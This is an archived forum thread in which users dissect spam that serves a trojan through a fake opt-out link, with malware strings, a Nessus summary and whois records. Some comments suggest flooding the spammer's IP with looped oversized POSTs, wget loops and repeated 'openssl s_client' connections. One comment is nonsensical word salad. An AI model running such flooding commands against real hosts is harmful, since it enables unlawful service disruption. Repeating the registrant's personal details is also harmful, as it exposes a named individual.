If the law requires that I have a valid licence when driving, is it OK if I call my dog "a valid licence" and have him sit in the back seat? "Everything is in order, officer. I have 'a valid licence' back here..." Just because you call a thing something, doesn't make it that thing.

Re:Err...no

[NatasRevol]

If it allows you to opt out using anying but IE, isn't it an opt out link? It's just that you're using a faulty browser.

Re:Err...no

Who says the opt-out link doesn't work? Maybe it does opt out. After all, why would they want to bombard their own zombie workforce with spam?

No maxlength on input field

[caffeine_monkey]

The "Email Addr" field at the bottom of the page doesn't use a maxlength property to limit the input. Here's what happens when you try to insert too much data:

cgi-lib.pl: Request to receive too much data: 945020 bytes

Now let's go fill his DB from the front end!

This just makes me say...

[jangobongo]

...thank god I have a Mac!

I went to the website to see for myself (and to do some /.ing) and the script tried twice to download the .exe file to my computer without my even touching the scrollbar.

250 million rows and counting

mysql> select count(*) from foobar;
+-----------+
| count(*) |
+-----------+
| 251920977 |
+-----------+
1 row in set (1 min 24.42 sec)

Even Dumber....

...is the very concept of allowing HTML code: clickable links and active crap to be put into the main body of SMTP emails at all. SMTP email was never intended for that in the first place. It was intended for simple text transport only to convey messages. Even just adding on binary attachments was an afterthought, and should have been left at that. At least attachments can be easily isolated and scanned for malware.

Brings to mind the old saying: "Just because you *can* do something doesn't mean that you *should* do it."

Re:Even Dumber....

[Frizzle+Fry]

...is the very concept of allowing HTML code: clickable links and active crap to be put into the main body of SMTP emails at all.

Can you clarify what mail prgoram you are referring to with the "active crap" comment? I've used pine, outlook and some of the web-based mail client (hotmail, gmail, yahoo mail) and none allow "active crap" in mail (disregarding very old versions of outlook, I think).

Whois earthlabs.biz

Domain Name: EARTHLABS.BIZ
Domain ID: D7451374-BIZ
Sponsoring Registrar: ENOM, INC.
Domain Status: clientHold
Domain Status: clientTransferProhibited
Registrant ID: DANIDANAE15B3AD6
Registrant Name: Domain Administrator
Registrant Organization: Askfind Ventures
Registrant Address1: GPO Box 8912
Registrant Address2: Central
Registrant City: Hong Kong
Registrant Postal Code: Nil
Registrant Country: Hong Kong
Registrant Country Code: HK
Registrant Email: askfindpay@yahoo.com
Administrative Contact ID: DANIDANAE15B3AD6
Administrative Contact Name: Domain Administrator
Administrative Contact Organization: Askfind Ventures
Administrative Contact Address1: GPO Box 8912
Administrative Contact Address2: Central
Administrative Contact City: Hong Kong
Administrative Contact Postal Code: Nil
Administrative Contact Country: Hong Kong
Administrative Contact Country Code: HK
Administrative Contact Email: askfindpay@yahoo.com
Billing Contact ID: DANIDANAE15B3AD6
Billing Contact Name: Domain Administrator
Billing Contact Organization: Askfind Ventures
Billing Contact Address1: GPO Box 8912
Billing Contact Address2: Central
Billing Contact City: Hong Kong
Billing Contact Postal Code: Nil
Billing Contact Country: Hong Kong
Billing Contact Country Code: HK
Billing Contact Email: askfindpay@yahoo.com
Technical Contact ID: DANIDANAE15B3AD6
Technical Contact Name: Domain Administrator
Technical Contact Organization: Askfind Ventures
Technical Contact Address1: GPO Box 8912
Technical Contact Address2: Central
Technical Contact City: Hong Kong
Technical Contact Postal Code: Nil
Technical Contact Country: Hong Kong
Technical Contact Country Code: HK
Technical Contact Email: askfindpay@yahoo.com
Name Server: NS1.WEBSOUTH.WS
Name Server: NS2.WEBSOUTH.WS
Created by Registrar: ENOM, INC.
Last Updated by Registrar: ENOM, INC.
Domain Registration Date: Thu Jul 29 06:02:08 GMT 2004
Domain Expiration Date: Thu Jul 28 23:59:59 GMT 2005
Domain Last Updated Date: Wed Sep 22 15:41:04 GMT 2004

------

added to stop lame filter

Nostrud sit lobortis aliquam velit consequat lobortis dolor autem augue consequat exerci blandit esse consequat delenit. Duis iriure aliquip ut, vel nulla ex consectetuer dolor dolore dolore lobortis delenit nibh eu, te et in, dolore eros ut enim dolore diam. In facilisis facilisis delenit aliquip laoreet at ut quis. Dolore nulla et aliquam quis, facilisi velit hendrerit eros ut dolore commodo, eu duis vero. Ex, suscipit autem, qui facilisis odio ad vel esse ad ad commodo.

Facilisis nostrud nisl suscipit suscipit at ullamcorper illum nulla tincidunt blandit nulla, dignissim in vulputate consequat dolore autem in et iriure zzril. Consequat odio, suscipit dolor wisi nonummy volutpat duis vero ut elit zzril, te duis duis minim ea erat et. Exerci vel vel molestie consequat tincidunt hendrerit at in esse ullamcorper vulputate te tation luptatum ex. Zzril quis laoreet minim dolor iusto consequat euismod te, dolor eum lorem tation vel ad dignissim minim wisi.

Nulla, consequat duis dolore feugiat augue, facilisis lorem vulputate esse at et te adipiscing nulla, zzril, blandit. Duis consectetuer volutpat vero autem veniam hendrerit consequat te quis suscipit iriure consequat in. Te zzril, diam hendrerit, ad et wisi, odio elit eu feugiat odio ut minim ut velit nulla dolore. Facilisis esse accumsan dignissim veniam blandit nibh ex vero praesent duis exerci magna nibh enim. N

Re:Whois earthlabs.biz

and lots more

Fill his database

[caffeine_monkey]

It looks like he's not checking the field length of that "email addr" input before inserting it into the DB, so it should be a simple matter for someone to write a script to continuously loop through a POST to http://61.218.79.53/o/cgi-bin/removeme.cgi with a large amount of data in the field name "email". If a few people do this, his DB should fill up pretty quick.

Re:Fill his database

[DigitalRaptor]

You assume he is even storing that data. It is quite possible the whole site is just a fraud to install his malware. Why store email addresses he already has? He sent the spam to that address in the first place. If I were in his shoes, doing what he'd doing, I'd have no reason to store the addresses. It would be interesting to "remove" a very specific account that is known nowhere else and see if it magically starts getting spam. Using the remove page as an email harvester is the only reason I can see to store the addresses entered (a lot of people put in ALL of their addresses on pages like this, not just the one that they receieved the email at).

Re:Fill his database

Why store email addresses he already has?

To identify the live ones?

Re:Fill his database

[gad_zuki!]

Because people typing their email addresses into that box means its a "known-good" email address. A list of known-goods beats a list of dead addresses any day of the week.

Honestly, why would you do this?

Why would you subject an important machine with important software/data to a potentially dangerous and well-known attack with as-of-yet unknown consequences?

It would have been much more prudent to format, install a clean copy of the OS, perform the test and reformat. Or try the attack in a virtual OS on a different parent OS.

I hate to say it, but it sounds like you deserved what you got ;) Best of luck and don't keep your machine plugged into the net anymore.

Re:Honestly, why would you do this?

[iMaple]

Well my Windows m/c is not important , I dont have much data on this. I just said that I use Windows on this bcos standby doesnt work properly in Linux.

I hate to say it, but it sounds like you deserved what you got ;)
I dont agree with u there. Thanks for you best wishes though, Anyway my m/c is still on the net, So good luck to you too. :)

Just forward these e-mails to your legislators ...

[smoyer]

asking that they revisit the CAN-SPAM act. When they click the scrollbar in the forwarded message, they'll finally understand why we didn't think the original bill was tough enough.

Re:Slightly OT-Malicious spam opt-outs and MYPOINT

[JimDabell]

It's not an email standard, according to the RFCs everything before the @ is called the "local part" and is interpreted in a system-specific manner once it arrives on the server. However the use of +suffix or -suffix is quite common and gmail supports it - so if you send an email to the address you mentioned, it would appear in the same mail account as richardjharris@... but with a different destination address, so you could filter on it or simply find out which address spam was sent to after the fact.

what F-Secure says

[scubacuda]

When you try to download the trojan, my AV classifies it as:

infection: backdoor.win32.agent.ce

Opt out link?

[Tooxs]

"Scarily the E-mail actually complies with the CAN-SPAM act as it only requires spammers to put an opt-out link in their mailings."

I would think that unless the link actually lets you opt out that it wouldn't qualify as an opt out link. No matter what you titled it.

But if you outlaw malicious attacks...

only outlaws will have malicious attacks!

Oh, wait...

$ strings windows-update32.exe

[Fudge.Org]

xProxyBot v 1.0.0
1.0.0
w32.exe
Windows Service Application
www.earthlabs.biz
sockproxy/rec.php
Software\Microsoft\Windows\CurrentVersion\Run
So ftware\Microsoft\Windows\CurrentVersion\RunServi ces

Okay...

[Tuxedo+Jack]

I took a look at this thing, and from the look of it, it appears to be a standard IRC bot. You know, the ones that run as whatever the logged-in user is?

Root, FTP access, HTTP access, an open proxy, the usual. Seems that the little bastard is being rather the norm these days.

It drops w32.exe in Prefetch and System32.

Removing its startup entries in Safe Mode with HijackThis and deleting the EXEs will fix it.

Re:Slightly OT-Malicious spam opt-outs and MYPOINT

[Black+Acid]

Destination filtering is an excellent idea, but unfortunately Gmail doesn't let you filter based on what the to header is not set to. I file all mail sent to blackacid@gmail.com into a junk mail folder, and only give out addresses such as blackacid+slashdot@gmail.com. I don't read any email sent without the plus sign.

The problem is many spammers set the to header to something totally bogus, or ignore it completely, yet the mail still arrives in my inbox. If only Google would allow more advanced filtering techniques, to header filtering could be much more effective. Of course, those that run their own mail server can already reap the benefits of this kind of filtering, but I know many people would enjoy using this feature with Google Mail.

First fix malicious links in Slashdot!

[microsopht]

Forget "spam out links". First fix malicious links in Slashdot! You might have seen the dubious "Gmail invites" links posted at the beginning of the comments. Inspite of having gmail account, stupid me,i clicked on the link to do an "analysis " of the gmail invite address!!

Too bad,slashdot too gave the site address as [google]after the link....It only opened a porn page ,with shaking windows.Thank god i was using firefox. I dont know what would have happened had i seen it with Internet explorer.

Even better i had images OFF when i visited.So kinda saved.But I would like to know if clicking on that link ,would cause any further harm to my computer.

And since the caption of the site name that slashdot provides been proved useless, how can i find the name of the real site that link will take me to?

Thanks.

Are Malicious links the bane of slashdot?

Re:First fix malicious links in Slashdot!

This has just recently been fixed in the past 30 minutes. Those "trick" links won't appear anymore so you are safe to click on links again.

Re:First fix malicious links in Slashdot!

[microsopht]

You think you are intelligent and all others stupid?
perhaps you will be taught

Why not use Slashdot effect for once?

[mi]

Put the proper link (full URL without the silly spaces) to the spammer's site and let slashdotters bring the site to its knees!

Register may have some silly users, but all visitors of this site are, of course, cool and don't use IE, do they?

Re:Why not use Slashdot effect for once?

[a24061]

Put the proper link (full URL without the silly spaces) to the spammer's site and let slashdotters bring the site to its knees!

wget in a loop in a shell script?

Re:Why not use Slashdot effect for once?

[mi]

wget in a loop in a shell script?

(I'd use fetch, but that's unimportant.)

It is your CPU and bandwidth against the spammer's. A single machine would not do. You need thousands of Slashdot visitors to click on the link at (almost) the same time. For that, the proper link has to be on the front page...

Why do you provide links?

[microsopht]

The comments page for this story has become a real security night mare on slashdot! Why do you have to provide direct links to the windows update .exe file? [ that too so many are providing it, as if it is a sig ].

And another guy is sayin - " what if the evil guys are reading SD and add opera and mozilla exploits " - [ not exact quote ].And then goes on to provide links to exploits in mozilla and opera [a google search link too].

By giving links to flaws in opera and mozilla , you want to help the evil guys who are reading slashdot?

Now dont argue - " You have to be stupid to click on those links, Iam annoyed how people click those links etc.
This may be slashdot , but still littering the commenst page with unsafe links does no good!

Links are to be provided where required .Not wherever possible.

Use SSL version for maximum effect

The brain-dead apache admin that put this box together made all the pages available over the SSL connection. So from your browser (preferably FireFox) use this link.

https://61.218.79.53/d/

Or if you have OpenSSL on your box (most *nix boxes do or you can download it from www.openssl.org) use this line in your favorite looped script:

openssl s_client -connect 61.218.79.53:443

This sets up an SSL connection. Even if they are using a HSM (Hardware Security Module) they cannot service more than 300-400 or so connections/sec with an HSM rated for 600 connections/sec. They aren't using an HSM, so it shouldn't take more than about 50-100 of these per second to fully tax the processor.

Re:Use SSL version for maximum effect

[dickrichardv8]

I just ordered the economy size order of Desiel Power using the sample credit card number they suggested. Do you think I will get it?

Domain information

[Pig+Hogger]

Here is the domain registration information.

since they use YAHOO e-mail address for registration, they are worthy of being disconnected upon complaining to YAHOO.

Hint: complain to yahoo with the subject line: "[UNAUTHORIZED COMMERCIAL USE] win2save@yahoo.com" so they can see it quicker.

Domain Name XCELENT.BIZ
Domain ID D7752456-BIZ
Sponsoring Registrar CSL COMPUTER SERVICE (D.B.A. JOKER.COM)
Sponsoring Registrar IANA ID 113
Domain Status clientTransferProhibited
Registrant ID CNEU-105661
Registrant Name Anandan Krishan
Registrant Organization Iscon & Krishan
Registrant Address1 Suite 50-12
Registrant Address2 Jalan Yap Kwan Seng.
Registrant City Kuala Lumpur
Registrant State/Province KL
Registrant Postal Code 50450
Registrant Country Malaysia
Registrant Country Code MY
Registrant Phone Number +603.27756842
Registrant Facsimile Number +603.27756642
Registrant Email win2save@yahoo.com
Administrative Contact ID CNEU-105617
Administrative Contact Name Anandan Krishan
Administrative Contact Organization Iscon & Krishan
Administrative Contact Address1 Suite 50-12
Administrative Contact Address2 Jalan Yap Kwan Seng.
Administrative Contact City Kuala Lumpur
Administrative Contact State/Province KL
Administrative Contact Postal Code 50450
Administrative Contact Country Malaysia
Administrative Contact Country Code MY
Administrative Contact Phone Number +603.27756842
Administrative Contact Facsimile Number +603.27756642
Administrative Contact Email win2save@yahoo.com
Billing Contact ID CNEU-105617
Billing Contact Name Anandan Krishan
Billing Contact Organization Iscon & Krishan
Billing Contact Address1 Suite 50-12
Billing Contact Address2 Jalan Yap Kwan Seng.
Billing Contact City Kuala Lumpur
Billing Contact State/Province KL
Billing Contact Postal Code 50450
Billing Contact Country Malaysia
Billing Contact Country Code MY
Billing Contact Phone Number +603.27756842
Billing Contact Facsimile Number +603.27756642
Billing Contact Email win2save@yahoo.com
Technical Contact ID CNEU-105617
Technical Contact Name Anandan Krishan
Technical Contact Organization Iscon & Krishan
Technical Contact Address1 Suite 50-12
Technical Contact Address2 Jalan Yap Kwan Seng.
Technical Contact City Kuala Lumpur
Technical Contact State/Province KL
Technical Contact Postal Code 50450
Technical Contact Country Malaysia
Technical Contact Country Code MY
Technical Contact Phone Number +603.27756842
Technical Contact Facsimile Number +603.27756642
Technical Contact Email win2save@yahoo.com
Name Server NS1.GRAITHBOADER.BIZ
Name Server NS2.GRAITHBOADER.BIZ
Name Server NS2.TIKONDES.BIZ
Created by Registrar CSL COMPUTER SERVICE (D.B.A. JOKER.COM)
Last Updated by Registrar CSL COMPUTER SERVICE (D.B.A. JOKER.COM)
Domain Registration Date Wed Sep 15 03:53:27 GMT 2004
Domain Expiration Date Wed Sep 14 23:59:59 GMT 2005
Domain Last Updated Date Wed Sep 15 04:03:16 GMT 2004

From the page source code...

[Pig+Hogger]

The real page is at "http://www.xce lent.biz/o/" but is hidden in a frameset so you can't see the real address.

Here is a gem code snippet:

function scrollRoot(y) {
// probably the dumbest scrollbar emulation on this planet ;)
frames["root"].scrollTo(0,(frames["root"].document .body.firstChild.offsetHeight/100*(y/document.getE lementById("root").offsetHeight*100)));
}

The page tries to emulate a scroll bar; I got suspicious when the scoll bar did not work properly with my mouse wheel...

Elsewhere in the code, it tries to download "http://www.xcelent.biz/o/windows-update32.exe" and excute it as an image... - but I can't download it as now, since it seems to be slashdotted...

Spam Slashdot Link Triggers Malicious Color Scheme

http://shit.slashdot.org/article.pl?sid=04/09/22/1 355238

Huh?

[haraldm]

Why anyone would use an e-mail program that allows clicking on something is beyond me. All the comfortable features that come with clickability have their price -- which in in this case is far too high IMHO.

DNS trace - Lets give the address' owner a call

[Honest+Man]

Well, we could always call the owner of the site and tell him how much we 'so' appreciate his exploit being used on ppl.

Domain Name: XCELENT.BIZ
Domain ID: D7752456-BIZ
Sponsoring Registrar: CSL COMPUTER SERVICE (D.B.A. JOKER.COM)
Domain Status: clientTransferProhibited
Registrant ID: CNEU-105661
Registrant Name: Anandan Krishan
Registrant Organization: Iscon & Krishan
Registrant Address1: Suite 50-12
Registrant Address2: Jalan Yap Kwan Seng.
Registrant City: Kuala Lumpur
Registrant State/Province: KL
Registrant Postal Code: 50450
Registrant Country: Malaysia
Registrant Country Code: MY
Registrant Phone Number: +603.27756842
Registrant Facsimile Number: +603.27756642
Registrant Email: win2save@yahoo.com
Administrative Contact ID: CNEU-105617
Administrative Contact Name: Anandan Krishan
Administrative Contact Organization: Iscon & Krishan
Administrative Contact Address1: Suite 50-12
Administrative Contact Address2: Jalan Yap Kwan Seng.
Administrative Contact City: Kuala Lumpur
Administrative Contact State/Province: KL
Administrative Contact Postal Code: 50450
Administrative Contact Country: Malaysia
Administrative Contact Country Code: MY
Administrative Contact Phone Number: +603.27756842
Administrative Contact Facsimile Number: +603.27756642
Administrative Contact Email: win2save@yahoo.com
Billing Contact ID: CNEU-105617
Billing Contact Name: Anandan Krishan
Billing Contact Organization: Iscon & Krishan
Billing Contact Address1: Suite 50-12
Billing Contact Address2: Jalan Yap Kwan Seng.
Billing Contact City: Kuala Lumpur
Billing Contact State/Province: KL
Billing Contact Postal Code: 50450
Billing Contact Country: Malaysia
Billing Contact Country Code: MY
Billing Contact Phone Number: +603.27756842
Billing Contact Facsimile Number: +603.27756642
Billing Contact Email: win2save@yahoo.com
Technical Contact ID: CNEU-105617
Technical Contact Name: Anandan Krishan
Technical Contact Organization: Iscon & Krishan
Technical Contact Address1: Suite 50-12
Technical Contact Address2: Jalan Yap Kwan Seng.
Technical Contact City: Kuala Lumpur
Technical Contact State/Province: KL
Technical Contact Postal Code: 50450
Technical Contact Country: Malaysia
Technical Contact Country Code: MY
Technical Contact Phone Number: +603.27756842
Technical Contact Facsimile Number: +603.27756642
Technical Contact Email: win2save@yahoo.com
Name Server: NS1.GRAITHBOADER.BIZ
Name Server: NS2.GRAITHBOADER.BIZ
Name Server: NS2.TIKONDES.BIZ
Created by Registrar: CSL COMPUTER SERVICE (D.B.A. JOKER.COM)
Last Updated by Registrar: CSL COMPUTER SERVICE (D.B.A. JOKER.COM)
Domain Registration Date: Wed Sep 15 03:53:27 GMT 2004
Domain Expiration Date: Wed Sep 14 23:59:59 GMT 2005
Domain Last Updated Date: Wed Sep 15 04:03:16 GMT 2004

**

Re:DNS trace - Lets give the address' owner a call

[a24061]

Well, we could always call the owner of the site and tell him how much we 'so' appreciate his exploit being used on ppl.
...
Registrant Phone Number: +603.27756842

That would be a good idea for a phone number in your own country (sorry if I'm wrongly assuming you're not in Malaysia), but who's willing to pay for overseas phone calls to complain about this?

Nessus says

Nessus Scan Report
------------------

SUMMARY

- Number of hosts which were alive during the test : 1
- Number of security holes found : 3
- Number of security warnings found : 16
- Number of security notes found : 25

TESTED HOSTS

www.xcelent.biz (Security holes found)

DETAILS

+ www.xcelent.biz :
. List of open ports :
o ftp (21/tcp) (Security notes found)
o ssh (22/tcp) (Security hole found)
o www (80/tcp) (Security notes found)
o sunrpc (111/tcp) (Security notes found)
o ldap (389/tcp) (Security notes found)
o https (443/tcp) (Security warnings found)
o windows-icfw (1002/tcp)
o H.323/Q.931 (1720/tcp) (Security notes found)
o mysql (3306/tcp) (Security hole found)
o x11 (6000/tcp) (Security warnings found)
o general/tcp (Security warnings found)
o general/udp (Security notes found)
o unknown (32768/tcp) (Security notes found)
o unknown (32769/tcp) (Security warnings found)
o sunrpc (111/udp) (Security notes found)
o omad (32768/udp) (Security hole found)
o general/icmp (Security notes found)

MOD PARENT (with helpfull address) UP!

[bot24]

Demonstrating that your browser is vulnerable and telling you how to fix the problem is not malicious. The program installed doesn't do anything other than showing you that you can be affected this exploit. Besides, who here actually uses IE?

Opti-Mail Blam Guardian IBM did sheldon maillink?

[tommywho70x]

A simple solution for all us poor victims of the M$IntroNet Exploder Techno-Gadget QuickTreeViews:

Do not click here.net[-]Auto-HYPHEN F10:EA8D:*ok*
Do not open with Yahoo! Free)ze)MAIL Client[+]
Do forward suspect message to your IAP[0]ISP[1]Let them get a put&call option M$MONEY-FYI-ADVISOR-YY-AA-HH-OO-!!-00.HTML+/-1.00S BC*XML*rss
(?QUESTION MARK? What color is it??" ")
Do not pass go. Do not collect $200. Do not assume your opinion is worth a SHIT=Stow High In Transit at Pleasure Boat Captains for Truth or the Landover Baptist Church - State Functions.

Do not forget to remember memcopy.htm&#169(c)Copyright 1999 Microsoft Corporation. Legal Document.doc Legal Information NT Authorized meathook Web-based E-Mail mailto: info@prestongates.com Plus! SUN.COM/ENG/LAW/yours?
JSP/PS/2.01 Mouse initialized by [(hp)]click[1]otis @ sprintmail.com [IBM]MOUSE.DRV=mouse.drv[0]

Let the Spam bots spam HIM

Anandan Krishan [some spam bot, please collect this].
Thanking you,
Anonymous Coward.

Btw, I've often noticed that my DNS registration address is the one that gets the most spam.